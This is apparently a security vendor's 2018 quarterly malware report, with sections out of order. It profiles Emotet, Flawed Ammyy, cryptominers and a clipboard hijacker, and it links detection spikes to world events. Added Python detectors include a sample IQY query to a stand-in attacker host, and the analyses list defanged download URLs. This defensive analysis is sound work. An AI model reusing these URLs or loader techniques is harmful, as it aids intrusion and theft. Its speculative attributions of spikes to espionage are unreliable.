Let’s take a closer look at two trojans, Kryptik and Zbot, that were the top detections not in only one but in multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host’s FTP servers but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan “Clicker” to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let’s examine “Zbot”, another name for the “Zeus” Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target’s computer already has a Virus and needs to be cleaned.
In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo’s aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect information as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or “cracking” software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics, or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia’s 2018 political revolution was accompanied by Comodo’s largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that “information wants to be free”. Evidence for this argument is provided by this timeline, which shows Comodo’s Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of “fake news”, Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine’s Independence Day as well as Ukraine’s testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine’s capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an “act of hostility”.
7.10 Finland, Russia, USA
Finally, let’s have a look at Comodo’s virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki’s suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence, and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information, or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies, and postures.
Comodo Threat Research Labs monitors, filters, and analyzes malware, ransomware, viruses, and other “unknown” potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia, and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists, and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam, or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government, and industry to gain additional insights into known and potential threats. CTRL’s mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.
About Comodo Cybersecurity
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world’s largest certificate authority, Comodo Cybersecurity authenticates, validates, and secures networks and infrastructures from individuals to mid-sized companies to the world’s largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network, and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine, and the United Kingdom. For more information, visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
2.1 The Most Widespread Trojan
The most proliferated trojan, TrojWare.Win32.Injector, is designed to steal credentials from infected computers. It was spread via a fake email imitating a message from a shipping and trading company. As seen in the screenshot, the attached malware is carefully disguised with a plausible name and icon to look like a real scanned document.
If a user takes the bait and runs the file, it copies itself to the AppData folder as D5E2DEE36C7A.exe, then launches itself from that location and starts to gather credentials present in the system.
It collects credentials and private data from known browsers, email clients, FTP clients, and WebDAV and SCP clients. Then it sends all the collected data to the attackers’ server, httpcallbedmlpackfarefrephp.
The phishing email
2.2 PowerShell-based attack with Emotet
Another alarming trend is related to the malware itself rather than its delivery method. Often cybercriminals use malware based not on native Windows .exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer. This type of attack is much harder to detect with antivirus tools.
Emotet is one of the most aggressive trojans currently active in cyberspace. Spread by various infection vectors and backed by a huge network of compromised hosts, it heavily affects many individuals and companies.
The following attack started with an email that imitated a message from the IRS about a “Tax Account Transcript”. Notice that the message is written in a cheerful manner to inspire user trust.
The phishing email
The attached file is an Office document containing a VBScript. As the default settings of a newly installed Microsoft Office do not allow execution of such scripts, the attackers added a special prompt to convince the victims to turn on VBScript execution.
The special option to convince the victims to turn on VBScript execution
The purpose of the VBScript is to launch PowerShell.
The malware downloads itself to a temporary folder and executes binaries located at: hxxpwwwiyilikleralemicomGtXvlc hxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmS hxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of writing, only the thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb).
The binary moves itself to C:\Windows\SysWOW64\lanesviewer.exe and creates a service, “lanesviewer”, to ensure persistence.
The malware creates the “lanesviewer” service to ensure persistence
And after that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals’ Command & Control server.
The next example is even more cunning because it infects computers via popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software
The Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks. What is most impressive is that it is based on legitimate software called Ammyy Admin. Its history is a striking example of how malicious hackers turn legitimate tools into a thief’s tool.
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.
The dark side of this tool is that its features ideally suit the purposes of cybercriminals. Unsurprisingly, perpetrators tried to adopt it for their malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin software with a bundle containing malware. Thus every user who downloaded Ammyy Admin became covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle continued endlessly.
As you can see in the diagram, Ammyy Admin was used in spreading many types of nefarious malware.
The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It’s a remote access trojan (RAT) that appeared in the wild at the beginning of 2016. It got its name from the leaked source code of the third Ammyy Admin version. Flawed Ammyy RAT lets the attackers use functions such as Remote Desktop control, File System Manager, proxy support, and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, etc.
The way Flawed Ammyy was spread in the second quarter deserves special attention because it used a new trick to infect users. What is especially worth noticing is the fact that this trick is also based on using legitimate software, Microsoft’s this time.
Flawed Ammyy is delivered to the victims through phishing emails with an IQY file attachment, as in the following screenshot.
The phishing email
IQY files are intended for making an Internet query from MS Excel, so an IQY contains a URL and other related parameters. It can download files and run them directly in MS Excel.
The infected IQY included a malicious URL, so it runs a chain of malicious files that results in downloading and running Flawed Ammyy via Windows PowerShell.
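As an added example (not from the report), the IQY layout just described can be checked before Excel ever opens the attachment: the Python below parses the plain-text format (query type, version, URL, then Key=Value parameters) and flags queries that leave an allowlist of internal reporting hosts or point at script-like content. The samples and the allowlist host are constructed placeholders.

```python
"""Parse and triage Excel Internet Query (.iqy) attachments.

An IQY file is plain text: the first line is the query type (WEB), the
second a version number, the third the URL Excel will fetch, and any further
lines are Key=Value parameters such as Selection=AllTables.  Since Excel
loads whatever that URL returns, a mail gateway can hold any IQY whose URL
points outside the organisation's own data sources.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Placeholder allowlist of internal data sources (assumption for this example).
ALLOWED_HOSTS = {"reports.corp.example"}
# Extensions that suggest a downloader stage rather than a spreadsheet feed.
SCRIPT_LIKE = (".exe", ".dll", ".ps1", ".vbs", ".js", ".hta", ".bat", ".cmd", ".dat")


@dataclass
class IqyQuery:
    kind: str
    version: str
    url: str
    params: dict = field(default_factory=dict)


def parse_iqy(text: str) -> IqyQuery:
    """Parse IQY text; tolerates CRLF line endings and blank lines."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3:
        raise ValueError("IQY needs at least type, version and URL lines")
    kind, version, url = lines[0].upper(), lines[1], lines[2]
    if kind != "WEB":
        raise ValueError(f"unsupported IQY type {kind!r}")
    params = {}
    for ln in lines[3:]:
        key, sep, value = ln.partition("=")
        if sep:
            params[key.strip()] = value.strip()
    return IqyQuery(kind, version, url, params)


def triage_iqy(text: str) -> list[str]:
    """Return the reasons to hold the attachment; an empty list means release."""
    try:
        query = parse_iqy(text)
    except ValueError as exc:
        return [f"unparseable: {exc}"]
    parts = urlsplit(query.url)
    reasons = []
    if parts.scheme not in ("http", "https"):
        reasons.append(f"unexpected scheme {parts.scheme!r}")
    elif parts.scheme == "http":
        reasons.append("cleartext http query")
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        reasons.append(f"host {host!r} not in allowlist")
    if parts.path.lower().endswith(SCRIPT_LIKE):
        reasons.append(f"script-like target {parts.path!r}")
    return reasons


# Constructed samples (not artifacts from the report).
BENIGN_IQY = ("WEB\r\n1\r\nhttps://reports.corp.example/q/sales.html\r\n"
              "Selection=AllTables\r\nFormatting=None\r\n")
SUSPECT_IQY = "WEB\n1\nhttp://stage.attacker.invalid/1.dat\nSelection=AllTables\n"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_IQY), ("suspect", SUSPECT_IQY)):
        print(name, triage_iqy(sample) or ["ok"])
```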
Malware runs PowerShell
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software. This feature makes it much harder for antivirus software to detect an attack.
2.4 The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became an 800-pound gorilla in the malware market in Q2. This trend will inevitably entail a change of attack vectors toward covert theft and manipulation of users. This trend is a real gift for cybercriminals and a terrible nightmare for users.
Trojans let attackers gain time. As the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases attacks can only be discovered too late, after money is withdrawn from a bank account or confidential data is published, etc. The merging of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a huge surge in such attacks and victims. And using legitimate tools like PowerShell to run malware will amplify the number of victims even more, because such attacks are much harder to detect with antiviruses.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures per the new trends above. Combining the best malware detection tools and methods of protecting data, built on defense-in-depth principles, provides the most promising solution.
[Chart: bar values 43188, 46382, 48881 on a 40000 to 50000 axis; months Apr, May, Jun]
3 Cryptominer Evolution
Going Fileless Killing Competitors Crashing Systems Cryptominers do not lead the Q2 malware pack but it does not mean that their impact is greatly diminished On the contrary current cryptominer behavior recalls that of an army preparing for battle training reprovisioning to fight more efficiently Cryptominers are quickly developing and gaining new dangerous abilities
Earlier cryptomining examples were only able to use infected machine resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight against antimalware tools. They can camouflage themselves, kill competing cryptominers, and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware consists of malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antivirus software to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that used legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
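The persistence chain described above (a scheduled task launching PowerShell with an encoded command that pulls a blob back out of the registry) can be hunted for in exported task definitions. The following Python is an added example, not Comodo's code or the BadShell sample: the task XML is constructed inline, the registry path and value name in it are placeholders, and the decoded script contains nothing beyond the two calls the detection looks for.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Task Scheduler exports use this XML namespace.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Signs that a decoded command reads code out of the registry and turns it back
# into bytes, which is the BadShell pattern the report describes.
REGISTRY_READ = re.compile(r"Get-ItemProperty|Get-ItemPropertyValue|HKLM:|HKCU:|Registry::", re.I)
BLOB_DECODE = re.compile(r"FromBase64String|\[System\.Convert\]", re.I)
ENCODED_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(arguments: str):
    """Return the plaintext behind a PowerShell -EncodedCommand argument, or None.
    The flag carries base64 over UTF-16LE, not UTF-8."""
    m = ENCODED_FLAG.search(arguments)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_task_xml(xml_text: str) -> dict:
    """Parse one exported task and report whether an action matches the pattern:
    PowerShell run with an encoded command that reads and decodes a registry blob."""
    root = ET.fromstring(xml_text)
    findings = {"powershell": False, "encoded": False, "registry_read": False,
                "blob_decode": False, "decoded": None}
    for exec_node in root.findall(".//t:Actions/t:Exec", TASK_NS):
        cmd = (exec_node.findtext("t:Command", default="", namespaces=TASK_NS) or "").lower()
        args = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS) or ""
        if "powershell" not in cmd:
            continue
        findings["powershell"] = True
        decoded = decode_encoded_command(args)
        if decoded is None:
            continue
        findings["encoded"] = True
        findings["decoded"] = decoded
        findings["registry_read"] = bool(REGISTRY_READ.search(decoded))
        findings["blob_decode"] = bool(BLOB_DECODE.search(decoded))
    findings["suspicious"] = (findings["encoded"] and findings["registry_read"]
                              and findings["blob_decode"])
    return findings


# Constructed sample script of the kind the report describes: it reads a value from a
# placeholder registry key and base64-decodes it. This is not a real BadShell script.
SAMPLE_SCRIPT = (
    "$b = (Get-ItemProperty -Path 'HKCU:\\Software\\PLACEHOLDER').Payload; "
    "$raw = [System.Convert]::FromBase64String($b)"
)


def make_task_xml(script: str) -> str:
    """Build a minimal task export whose action runs `script` via -EncodedCommand."""
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return (
        '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
        "<Actions><Exec><Command>powershell.exe</Command>"
        f"<Arguments>-NoP -W Hidden -EncodedCommand {enc}</Arguments></Exec></Actions></Task>"
    )


if __name__ == "__main__":
    # Real exports come from `schtasks /query /xml` or Get-ScheduledTask | Export-ScheduledTask.
    print(inspect_task_xml(make_task_xml(SAMPLE_SCRIPT)))
```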
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all affected computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus software and persistence in the system are the most important attributes of a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals pay special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is designed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task, mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes carry the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out from other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows.
The code below downloads CoinMiner for the Windows architecture in use (x86 or x64) and then checks whether a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes it is instructed to kill. The lists include other types of cryptominers.
In this way, CoinMiner has the victim's computer entirely to itself and uses its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, which made it easier for users to detect them. In Q2 these cryptominers learned to hide. CoinHive is the brightest example.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its snippet of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and in cybersecurity reports, users started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage CoinHive's presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co.
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
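A page check that looks past the obfuscation layer would catch the trick described above: decode base64 runs, then flag any iframe that is 1x1 or that points at the cnhv.co shortener. The scanner below is an added example, not Comodo's code; the sample page, its document.write() wrapper and the shortener path are constructed placeholders.

```python
import base64
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the report ties to the trick: the CoinHive shortlink domain and CoinHive itself.
# Extend with whatever shorteners you consider suspicious in your own environment.
SUSPICIOUS_HOSTS = {"cnhv.co", "coinhive.com"}

# Base64 runs long enough to hide a tag (heuristic threshold chosen for this example).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")


class IframeCollector(HTMLParser):
    """Collect every <iframe> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append(dict(attrs))


def decoded_layers(html: str):
    """Yield the page itself, then every base64 run in it that decodes to markup."""
    yield html
    for m in B64_RUN.finditer(html):
        try:
            text = base64.b64decode(m.group(0), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if "<" in text:
            yield text


def _dimension(value):
    """Parse width/height attribute values such as '1', '1px' or '640'."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def find_hidden_miner_iframes(html: str):
    """Return iframes, visible or hidden behind base64, that are 1x1 or smaller or that
    point at a suspicious host. Each finding records src, size and the reasons."""
    findings = []
    for layer in decoded_layers(html):
        collector = IframeCollector()
        collector.feed(layer)
        for attrs in collector.iframes:
            src = attrs.get("src") or ""
            host = (urlparse(src).hostname or "").lower()
            w, h = _dimension(attrs.get("width")), _dimension(attrs.get("height"))
            reasons = []
            if w is not None and h is not None and w <= 1 and h <= 1:
                reasons.append("1x1 iframe")
            if host in SUSPICIOUS_HOSTS:
                reasons.append(f"suspicious host {host}")
            if reasons:
                findings.append({"src": src, "width": w, "height": h, "reasons": reasons})
    return findings


# Constructed sample page: a normal video embed plus a document.write() of a
# base64-encoded 1x1 iframe aimed at the cnhv.co shortener (path is a placeholder).
HIDDEN_TAG = '<iframe src="https://cnhv.co/PLACEHOLDER" width="1" height="1"></iframe>'
SAMPLE_PAGE = (
    "<html><body><h1>News</h1>"
    '<iframe src="https://example.com/video" width="640" height="360"></iframe>'
    '<script>document.write(atob("'
    + base64.b64encode(HIDDEN_TAG.encode()).decode()
    + '"))</script></body></html>'
)

if __name__ == "__main__":
    for finding in find_hidden_miner_iframes(SAMPLE_PAGE):
        print(finding)
```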
The next malware in the row prefers not to mine cryptocurrency but to steal it on the fly.
3.5 Cryptocurrency clipboard hijacker intercepts transfers
It would be more accurate to call this program a cryptothief rather than a cryptominer, because it does not devour an infected machine's resources but instead actually steals cryptocurrency, redirecting it to the perpetrator.
Cryptocurrency transfers require a wallet address. The address is a long string of mixed characters and numbers, so it is almost impossible to remember or to type in manually. That is why users usually copy and paste a wallet address to make a transaction. Cybercriminals regard this copy-paste step as a breach they can use to their advantage.
The cryptocurrency clipboard hijacker checks the clipboard for a copied wallet address. Upon finding one, it swaps it for the address of a wallet under the attacker's control. So the unaware owner of the infected machine delivers cryptocoins straight into cybercriminals' hands.
New Cryptocurrency Clipboard Hijacker sample can monitor 2,343,286 addresses
This malware is distributed in a bundle with the All-Radio 4.27 Portable software. All-Radio 4.27 is a legitimate video and audio player created by Russian developers. But cybercriminals copied the program and added malicious code. The malicious version of All-Radio 4.27 was used to spread different types of malware, clipboard cryptocurrency hijackers among them.
Here is an example of a clipboard hijacker attack.
A user copied the wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs, but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm.
An example of a clipboard hijacker attack
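The defence against the swap described above is not address validation (the attacker's address is a perfectly valid one) but comparing what is about to be pasted with what was actually copied. The guard below is an added example, not Comodo's code: it replays the two addresses from the example above and, separately, shows that a Base58Check checksum test alone would not have caught the substitution. The clipboard events are constructed; hooking a real clipboard is platform-specific and left out.

```python
import hashlib
import re

# Base58 alphabet used by Bitcoin addresses (no 0, O, I, l).
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Legacy Bitcoin address shape: P2PKH starts with 1, P2SH with 3, 26 to 35 characters.
BTC_LEGACY = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")


def base58check_valid(addr: str) -> bool:
    """Decode Base58Check and verify the 4-byte double-SHA256 checksum.
    Note: a swapped-in attacker address passes this check just as well."""
    n = 0
    for ch in addr:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    # Each leading '1' encodes one leading zero byte.
    leading = len(addr) - len(addr.lstrip("1"))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    raw = b"\x00" * leading + body
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


class ClipboardGuard:
    """Remember the last wallet address the user copied and, before it is pasted into
    a transaction form, confirm the clipboard still holds exactly that string."""

    def __init__(self):
        self.expected = None

    def on_copy(self, text: str) -> None:
        """Only address-shaped content is guarded; other clipboard text is ignored."""
        text = text.strip()
        self.expected = text if BTC_LEGACY.match(text) else None

    def check_before_paste(self, clipboard: str) -> dict:
        """Return a verdict; swapped=True means the clipboard no longer matches the copy."""
        current = clipboard.strip()
        if self.expected is None:
            return {"swapped": False, "reason": "no address was copied"}
        if current == self.expected:
            return {"swapped": False, "reason": "clipboard unchanged"}
        reason = ("clipboard now holds a different wallet address"
                  if BTC_LEGACY.match(current)
                  else "clipboard content replaced by non-address text")
        return {"swapped": True, "copied": self.expected, "found": current, "reason": reason}


def audit_events(events):
    """Replay (action, text) clipboard events and collect every swap verdict."""
    guard, alerts = ClipboardGuard(), []
    for action, text in events:
        if action == "copy":
            guard.on_copy(text)
        elif action == "paste":
            verdict = guard.check_before_paste(text)
            if verdict["swapped"]:
                alerts.append(verdict)
    return alerts


# Constructed event stream using the two addresses from the report's example.
SAMPLE_EVENTS = [
    ("copy", "3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs"),
    ("paste", "1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm"),
]

if __name__ == "__main__":
    for alert in audit_events(SAMPLE_EVENTS):
        print(alert)
```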
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity, they seem to be coming back in an updated disguise and promise to become a serious new challenge for cybersecurity departments and vendors.
4 Android Devices Under Siege
4.1 Spying, Stealing, Mining
Android devices are rapidly becoming high-value targets for cybercriminals and malware authors. This is not surprising, because today almost any smartphone is a treasure trove of information for perpetrators. People increasingly use smartphones for financial operations, but those are not the only jackpot for attackers. Today every smartphone contains a plethora of confidential information about its owner.
